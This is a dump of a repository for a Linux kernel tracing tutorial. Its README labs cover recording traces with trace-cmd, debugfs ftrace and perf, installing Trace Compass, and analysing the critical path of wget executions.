4 | 5 | - - - 6 | 7 | ### Task 1: Install trace-cmd 8 | 9 | `trace-cmd` is a helper application for ftrace that does not require to directly set values in debugfs in order to trace. It is available as a package in most linux distributions, so to install, just ask your preferred package manager, for instance 10 | 11 | ``` 12 | sudo apt-get install trace-cmd 13 | ``` 14 | 15 | - - - 16 | 17 | ### Task 2: Record a trace with trace-cmd 18 | 19 | The following commands will enable the events necessary to take advantage of a maximum of analyses in Trace Compass, without generating a trace too large. It is the equivalent of the trace generated in the lttng tutorial. 20 | 21 | ``` 22 | $ sudo trace-cmd record -e sched_switch -e sched_waking -e sched_pi_setprio -e sched_process_fork \ 23 | -e sched_process_exit -e sched_process_free -e sched_wakeup \ 24 | -e softirq_entry -e softirq_raise -e softirq_exit -e irq_handler_entry -e irq_handler_exit \ 25 | -e block_rq_complete -e block_rq_insert -e block_rq_issue \ 26 | -e block_bio_frontmerge -e cpu_frequency \ 27 | -e net_dev_queue -e netif_receive_skb \ 28 | -e hrtimer_start -e hrtimer_cancel -e hrtimer_expire_entry -e hrtimer_expire_exit \ 29 | -e sys* \ 30 | wget https://lttng.org 31 | ``` 32 | 33 | - - - 34 | 35 | ### Task 3: Get the Trace For TraceCompass 36 | 37 | TraceCompass supports ftrace traces in textual raw format. To obtain a file that can be imported in Trace Compass, you execute the following command: 38 | 39 | ``` 40 | $ sudo trace-cmd report -R > myFtrace.txt 41 | ``` 42 | 43 | Then you can import `myFtrace.txt` in TraceCompass and it should be recognized as an ftrace trace. 44 | 45 | You can also import the binary trace directly, but only if `trace-cmd` is available on the machine where TraceCompass is. The ftrace binary format calls the `trace-cmd report -R` command to obtain the trace. It just avoids the user having to do the step above. 46 | 47 | - - - 48 | 49 | ### Task 4: Record a Trace With DebugFS 50 | 51 | If `trace-cmd` cannot be installed, it is possible to use ftrace directly in the debugfs. 
Here is how to obtain the same result as above: 52 | 53 | ```bash 54 | sudo mount -t debugfs nodev /sys/kernel/debug 55 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_wakeup/enable 56 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_switch/enable 57 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_waking/enable 58 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_pi_setprio/enable 59 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_fork/enable 60 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_exit/enable 61 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_free/enable 62 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_raise/enable 63 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_entry/enable 64 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_exit/enable 65 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/irq_handler_entry/enable 66 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/irq_handler_exit/enable 67 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_complete/enable 68 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_insert/enable 69 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_issue/enable 70 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_bio_frontmerge/enable 71 | sudo echo 1 > /sys/kernel/debug/tracing/events/power/cpu_frequency/enable 72 | sudo echo 1 > /sys/kernel/debug/tracing/events/net/net_dev_queue/enable 73 | sudo echo 1 > /sys/kernel/debug/tracing/events/net/netif_receive_skb/enable 74 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_start/enable 75 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_cancel/enable 76 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_expire_entry/enable 77 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_expire_exit/enable 78 | sudo echo 1 > /sys/kernel/debug/tracing/events/syscalls/enable 79 | sudo echo 1 > /sys/kernel/debug/tracing/tracing_on 80 | 81 | # Something to trace 82 | wget https://lttng.org 83 | 84 | sudo echo 0 > /sys/kernel/debug/tracing/tracing_on 85 | ``` 86 | 87 | Then, to obtain the trace to import in TraceCompass: 88 | 89 | ``` 90 | $ sudo cat /sys/kernel/debug/tracing/trace > myFtraceFile.txt 91 | ``` 92 | 93 | - - - 94 | 95 | #### Next 96 | 97 | * [Record kernel trace with perf](../005-record-kernel-trace-perf) to record a kernel trace with perf 98 | or 99 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 100 | or 101 | * [Back](../) for more options 102 | -------------------------------------------------------------------------------- /labs/005-record-kernel-trace-perf/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With Perf 2 | 3 | While this tutorial will mainly use LTTng for tracing, as it can provide both kernel and userspace traces, synchronized on the same time reference, it is also possible to get the same results for kernel tracing using `perf`. Like ftrace, perf has the advantage that it is builtin the linux kernel and many people are used to it. It can do both sampling or tracing, it is a very flexible tracer. In this lab, you will obtain a kernel trace that can then be analyzed by the visualization tools. 4 | 5 | *Note on perf*: The perf binary trace is _not_ readable by Trace Compass. It has to be converted to CTF. 
[CTF or Common Trace Format](http://diamon.org/ctf/) is a binary trace format that is very flexible and fast to write. It is the format used by LTTng kernel and userspace traces. There is a perf2ctf converter built into perf, but it requires compiling perf with `libbabeltrace`, a library providing an API to write CTF in C. Most distros do not have this option compiled in, and compiling it yourself means building perf from the Linux kernel sources. Debian has it, but we know of no other distro with this feature. 6 | 7 | - - - 8 | 9 | ### Task 1: Record a Trace With Perf 10 | 11 | `perf` is a tool that can be used for sampling, tracing or gathering performance counters. It is very flexible and can provide a lot of useful information. The [perf documentation](https://perf.wiki.kernel.org/index.php/Main_Page) contains exhaustive information on the various perf commands and options. 12 | 13 | Here, we will show how to trace the kernel events, so we can obtain a trace equivalent to the ftrace and lttng kernel traces. We will again trace the `wget` command and get its trace. 14 | 15 | ``` 16 | $ sudo perf record -a -e sched:sched_switch -e sched:sched_waking \ 17 | -e sched:sched_pi_setprio -e sched:sched_process_fork -e sched:sched_process_exit \ 18 | -e sched:sched_process_free -e sched:sched_wakeup \ 19 | -e irq:softirq_entry -e irq:softirq_raise -e irq:softirq_exit \ 20 | -e irq:irq_handler_entry -e irq:irq_handler_exit \ 21 | -e block:block_rq_complete -e block:block_rq_insert -e block:block_rq_issue \ 22 | -e block:block_bio_frontmerge -e power:cpu_frequency \ 23 | -e net:net_dev_queue -e net:netif_receive_skb \ 24 | -e timer:hrtimer_start -e timer:hrtimer_cancel -e timer:hrtimer_expire_entry -e timer:hrtimer_expire_exit \ 25 | -e syscalls:sys_enter_* -e syscalls:sys_exit_* \ 26 | wget https://lttng.org 27 | ``` 28 | 29 | - - - 30 | 31 | ### Task 2: Convert the Trace to CTF 32 | 33 | To open it in TraceCompass, the trace has to be converted to CTF. To do so, use the following command: 34 | 35 | ``` 36 | $ sudo perf data convert [--all] --to-ctf /path/to/ctf/folder 37 | ``` 38 | 39 | The `--all` option will also convert the mmap and mmap2 events used to map loaded libraries to the address spaces of processes. These events will all have a timestamp of 0 in the resulting trace, thus making the trace appear "longer" than it is. The option is not necessary for kernel tracing, as the mappings are not used, but for sampling, where symbols need to be resolved to the proper library/function, it should be present to allow proper symbol resolution. 40 | 41 | If you get the following error message, then you're out of luck: CTF conversion support is not compiled in. 42 | 43 | ``` 44 | No conversion support compiled in. perf should be compiled with environment variables LIBBABELTRACE=1 and LIBBABELTRACE_DIR=/path/to/libbabeltrace/ 45 | ``` 46 | 47 | You may use `lttng` or `ftrace` instead to obtain a kernel trace to visualize. 48 | 49 | - - - 50 | 51 | #### Next 52 | 53 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 54 | or 55 | * [Back](../) for more options 56 | -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/README.md: -------------------------------------------------------------------------------- 1 | ## Installing Trace Compass 2 | 3 | In this lab, you will install Trace Compass on the machine you'll use to view the traces. 4 | 5 | *Pre-requisites*: A viewing machine; it does not have to be a Linux machine.
6 | 7 | - - - 8 | 9 | ### Task 1: Install Java > 11 10 | 11 | Trace Compass is an Eclipse-based application and needs at least Java 11 to run. Make sure you have the correct version. 12 | 13 | ``` 14 | $ java -version 15 | openjdk version "11.0.11" 2021-04-20 16 | OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04) 17 | OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode, sharing) 18 | ``` 19 | 20 | If the java command is not found or you have an older version of java installed, you need to install java. On an ubuntu machine, it would be 21 | 22 | ``` 23 | $ sudo apt-get install openjdk-11-jre 24 | $ java -version 25 | openjdk version "11.0.11" 2021-04-20 26 | OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04) 27 | OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode, sharing) 28 | ``` 29 | 30 | If the version is still not correct, you may need to update your default java version using the following command 31 | 32 | ``` 33 | $ sudo update-alternatives --config java 34 | There are 2 choices for the alternative java (providing /usr/bin/java). 35 | 36 | Selection Path Priority Status 37 | ------------------------------------------------------------ 38 | * 0 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1101 auto mode 39 | 1 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1101 manual mode 40 | 2 /usr/lib/jvm/java-11-openjdk-amd64/jre/bin/java 1111 manual mode 41 | 42 | Press to keep the current choice[*], or type selection number: **2** 43 | ``` 44 | 45 | - - - 46 | 47 | In Windows and MacOs, download the jdk [here](https://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html) 48 | 49 | ### Task 2: Get Trace Compass 50 | 51 | Go to the [Trace Compass web site](http://tracecompass.org) and click on the big green button to download the latest release of Trace Compass. 52 | 53 | Then extract the content of the downloaded archive and simply start trace-compass from the extracted folder 54 | 55 | ``` 56 | $ cd ~/Downloads 57 | $ tar xf trace-compass-3.3.0-20180307-1910-linux.gtk.x86_64.tar.gz 58 | $ cd trace-compass 59 | $ ./tracecompass 60 | ``` 61 | 62 | You should reach an empty workspace. And voilà! You are now ready to import and analyze traces with Trace Compass. Proceed to other labs. 63 | 64 | ![empty workspace](screenshots/emptyWorkspace.png "Trace Compass empty workspace") 65 | 66 | - - - 67 | 68 | ### Task 3: Install the Required Add-Ons For This Tutorial 69 | 70 | Some labs in this tutorial require additional plugins that are not part of the main Trace Compass tool, but are available through the Trace Compass Incubator repo. We will add those required plugins now. 71 | 72 | To install the plugins, go to the *Tools* -> *Add-ons* 73 | 74 | ![Addons](screenshots/addons.png "Addons") 75 | 76 | A dialog will open with a list of plugins that can be installed. For this tutorial, we will needs the following: 77 | 78 | * **Generic Callstack (Incubator)**: For various labs 79 | * **Global Filters (Incubator)**: For various labs 80 | * **Trace Compass Scripting Javascript (Incubation)**: For scripting labs 81 | * **Trace Compass ftrace (Incubation)**: If you have system traces with ftrace 82 | * **Virtual Machine And Container Analysis (Incubator)**: For advanced topics with containers and virtual machine 83 | * **Trace Compass opentracing (Incubation)**: For advanced topic with opentracing 84 | 85 | Check those plugins in the *Install* wizard, as shown below. 
Then click *Finish* and follow the instructions on screen. Trace Compass will have to be restarted at the end of the process. 86 | 87 | ![AddonsGenericCallstack](screenshots/genericCallStackAddons.png "Addons GenericCallstack") 88 | 89 | - - - 90 | 91 | ### Task 4: Import the Traces For The Tutorial 92 | 93 | Each lab comes with the instructions to produce the traces yourself, so *if you plan on making your own traces, you may skip this step*. Otherwise, there is an [archive](../TraceCompassTutorialTraces.tgz) that contains all the traces for the labs. You may import it now. 94 | 95 | Upon opening Trace Compass, there is a default project named *Tracing* in the ``Project Explorer``, expand it and right-click on the *Traces* folder. Select *Import...* to open the *Trace Import* wizard. 96 | 97 | ![ImportTraceMenu](screenshots/importTraceMenu.png "Trace Compass Import Trace Menu") 98 | 99 | Check the *Select archive file* radio-button and find the archive you want to import. 100 | 101 | ![ImportTraceDialog](screenshots/importTraceDialog.png "Trace Compass Import Trace Dialog") 102 | 103 | The list on the left will show the folder structure inside that archive, you can select the top-level element and click *Finish*. Make sure the options are as shown above, ie the *Preserve folder structure* is **checked** and *Create experiment* is **unchecked**. 104 | 105 | All the traces should be available, each under a folder named for the lab that uses them. 106 | 107 | ![AllTracesJustImported](screenshots/tutorialTracesImported.png "Tutorial Traces Imported") 108 | 109 | - - - 110 | 111 | #### Next 112 | 113 | * [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass) 114 | or 115 | * [Back](../) for more options 116 | -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/addons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/addons.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/emptyWorkspace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/emptyWorkspace.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/genericCallStackAddons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/genericCallStackAddons.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/importTraceDialog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/importTraceDialog.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/importTraceMenu.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/importTraceMenu.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/tutorialTracesImported.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/tutorialTracesImported.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/controlFlowView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/controlFlowView.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/fullTimeScale.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/fullTimeScale.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/histogramTimeRanges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/histogramTimeRanges.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceDialog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceDialog.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceMenu.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/kernelTraceJustOpened.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/kernelTraceJustOpened.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/projectExplorerExpanded.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/projectExplorerExpanded.png 
-------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/slowLs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/slowLs.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewFilter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewFilter.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewLegend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewLegend.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewRemoveFilter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewRemoveFilter.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewSearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewSearch.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassCpuUsage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassCpuUsage.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassDiskActivity.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassDiskActivity.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassLatencyViews.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassLatencyViews.png -------------------------------------------------------------------------------- 
/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassStatisticsView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassStatisticsView.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing wget and showing the critical path 2 | 3 | In this lab, you will learn to view the critical path of a thread from the system's point of view, compare two executions of the same program and understand what is happening behind the scenes. In a program, a task may wait for something, for instance, the result of another task or the network. These wait dependencies are computed by the *OS Execution Graph* and can be seen using the critical path analysis. The critical path is the path that, if decreased, can decrease the duration of the application. 4 | 5 | ![KernelWaitAnalysisDjango](screenshots/kernelWaitAnalysisDjango.png "Trace Compass Kernel Wait Analysis") 6 | 7 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. You also need to know how to record a trace and open it in Trace Compass. You can learn that by doing the [Record a kernel trace](../003-record-kernel-trace-lttng/) lab and the [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass/). 8 | 9 | - - - 10 | 11 | ### Task 1: Recording two executions of wget 12 | 13 | For this lab, we will look at 2 executions of the `wget` command. The traces can be recorded using [lttng-record-trace](https://github.com/tahini/lttng-utils) 14 | or lttng directly to trace the command: 15 | 16 | ``` 17 | $ lttng-record-trace wget http://www.dorsal.polymtl.ca 18 | ``` 19 | or 20 | ``` 21 | $ lttng create 22 | $ lttng enable-event -k -a 23 | $ lttng start 24 | $ wget http://www.dorsal.polymtl.ca 25 | $ lttng destroy 26 | ``` 27 | 28 | The 2 traces provided with this lab did the exact same query. The first one, in the `wget-first-call` trace took ~530 ms to complete, while the second one in `wget-second-call` took 10 times less. 29 | 30 | :question: What hypotheses can we make to explain the differences in the execution time of wget? 31 | 32 | - - - 33 | 34 | ### Task 2: Get the Critical Path Of The Trace 35 | 36 | We first need to open the critical path view, either by pressing `ctrl-3` and searching for `Critical Flow` view, or in the `Project Explorer` it would be under the `Views` element under the trace, `OS Execution Graph` -> `Critical Flow View`. 37 | 38 | Since we know which process we are interested in, we can search for it in the `Control Flow` view. We can hit the `ctrl-f` shortcut and type wget. 39 | 40 | ![SearchProcessTrace](screenshots/searchProcessTrace.png "Trace Compass Search Process") 41 | 42 | Once you have done that, you can right-click on the `wget` line and select `Follow wget/` where tid is the Thread ID of wget in your trace. As we can see, for this example, you would've selected `Follow wget/5628`. The `Follow ` means we are interested in additional information on this thread and it will trigger all analyses and actions that concerns a single thread. 
The *Critical Path* analysis is one of them. After executing, the result of the critical path should appear in the `Critical Flow` view. 43 | 44 | The first screenshot shows the full critical path and the second is zoomed in towards the beginning of the process. 45 | 46 | ![FollowProcess](screenshots/followProcess.png "Trace Compass Follow Process") 47 | 48 | ![FollowProcessZoom](screenshots/followProcessZoom.png "Trace Compass Follow Process") 49 | 50 | - - - 51 | 52 | ### Task 3: Understanding the Critical Path 53 | 54 | The `OS Execution Graph` analysis that is the base of the critical path computes the dependencies between the threads only from the kernel events. It will try to explain the causes of a thread being blocked by following what triggered the wakeup of the thread. For example, the reception of a network packet will cause a wakeup event for the thread that was waiting for this packet. So we can infer that the thread was blocked waiting for network. 55 | 56 | The `Critical Path` analysis starts from the end of the thread and moves back through the dependency chain to get the longest path of waiting for resources. It would find out if a process was waiting for a semaphore owned by another thread or if it was waiting on disk, etc. 57 | 58 | In the case of the `wget` critical path, there is no dependency with any other thread on the machine, as should be expected from such an application, so it looks like the line of the process of the `Control Flow` view, only that the **blocked** states are replaced by the reasons of the blocking. The following screenshot shows the legend of the `Critical Path` view. 59 | 60 | ![CriticalPathLegend](screenshots/criticalPathLegend.png "Critical Path Legend") 61 | 62 | We can understand from this that our `wget` thread had a period of unknown blocked states at the beginning, but the label of *nvme0q2* tells that it was waiting for the disk. And for the rest of the time, it was waiting for the network. 63 | 64 | - - - 65 | 66 | ### Task 4: Comparing two views 67 | 68 | :small_red_triangle_down: 69 | 70 | To compare two critical paths together, you need two `Critical Flow View` from the two traces. First, let's pin the view to one trace by clicking the down arrow next to the pin icon in the view. 71 | 72 | ![PinToFirstTrace](screenshots/pinToFirstTrace.png "Trace Compass Pin to First Trace") 73 | 74 | Then in the view menu, at the right of the toolbar, select `new view, pinned to `. 75 | 76 | ![NewViewPinnedToSecond](screenshots/newViewPinnedToSecond.png "Trace Compass New View Pinned to Second") 77 | 78 | To display the critical path of the second trace, you can repeat task 2 for the second trace. Now both `Critical Flow` views should be populated with their respective `wget` critical paths. 79 | 80 | :small_red_triangle: 81 | 82 | - - - 83 | 84 | ### Task 5: Critical path analysis 85 | 86 | You should now have the 2 critical paths side by side to compare their execution. 87 | 88 | We can see the time difference between the two executions by simply selecting the range of the process activity for each critical path. The time span will be displayed at the bottom of the window. 89 | 90 | ![MeasureTimeDifference](screenshots/measureTimeDifference.png "Trace Compass Measure Time Difference") 91 | 92 | We see that the second critical path does not have the access to disk that we see in the beginning of the first one. The network phase is also much longer the first time than the next one. 
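If you recorded your own pair of traces and want to reproduce the disk-access part of this difference, one simple approach (a sketch only, using the same URL as in Task 1; adjust it to your setup) is to drop the page cache before the first run, so the `wget` binary and its libraries have to be read from disk again:

```
$ sync && echo 3 | sudo tee /proc/sys/vm/drop_caches   # flush the page cache, so the next run is "cold"
$ lttng-record-trace wget http://www.dorsal.polymtl.ca  # cold run: expect disk accesses at the start
$ lttng-record-trace wget http://www.dorsal.polymtl.ca  # warm run: binary and libraries already in memory
```

The second trace should then show little or no disk waiting at the beginning of its critical path, just like the `wget-second-call` trace provided with this lab.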
93 | 94 | We can thus answer our hypothesis from the beginning as to why there was a 10X time difference between the 2 executions: 95 | 96 | 1) For the first trace, the `wget` binary was fetched from disk, while it was already in memory the next time. 97 | 2) On the first query to the web page, the server probably had some setting up to do: Wake up a virtual machine on server? Fetch the page from disk? Cache the page? 98 | 99 | If we had a trace of the server side, we would be able to better understand the network latency. We will do that in an [advanced lab](../301-tracing-multiple-machines) later in this tutorial. 100 | 101 | - - - 102 | 103 | ### Conclusion 104 | 105 | In the lab, you've learned how to use Trace Compass to find and compare the critical path of some wget process executions. The critical path can help find the root cause of why a process is particularly slow, why it was blocked. 106 | 107 | - - - 108 | 109 | #### Next 110 | 111 | * [Compare Package Managers](../103-compare-package-managers) for hands-on experimentation of system traces. 112 | or 113 | * [System Tracing On Multiple Machines](../301-tracing-multiple-machines) to analyze this client trace with a server trace. 114 | or 115 | * [Back](../) for more options 116 | -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/compareCriticalPaths.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/compareCriticalPaths.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/criticalPathLegend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/criticalPathLegend.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/followProcess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/followProcess.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/followProcessZoom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/followProcessZoom.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/kernelWaitAnalysisDjango.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/kernelWaitAnalysisDjango.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/measureTimeDifference.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/measureTimeDifference.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/newViewPinnedToSecond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/newViewPinnedToSecond.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/pinToFirstTrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/pinToFirstTrace.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/searchProcessTrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/searchProcessTrace.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/README.md: -------------------------------------------------------------------------------- 1 | ## Compare Package Managers 2 | 3 | In this lab, we will use kernel tracing to compare the behaviors of common utility that varies from linux distro to linux distro: package managers. They all do the same thing: install a package on the system, but they are quite different. You will also learn to search and filter in time graph views and make bookmarks to identify regions of interest in the trace. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. You should have done the [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass) and the [Wget Critical Path](../102-tracing-wget-critical-path) labs. 6 | 7 | - - - 8 | 9 | ### Task 1: Obtain the Traces 10 | 11 | Since most people have only one distro around them (though people reading this may be the type to have more), we have provided with this lab the necessary traces for some common package managers installing the `tree` package: `apt` (debian-flavor), `yum` (Red Hat flavor), `pacman` (Arch Linux) and `zypper` (OpenSuse). 12 | 13 | In TraceCompass, you can import the trace directly as an archive file. 14 | 15 | Right-click on the project's `Traces` folder in TraceCompass and click *Import*. The import wizard will open. Check the *Select archive file* radio-button and find the archive you want to import. 
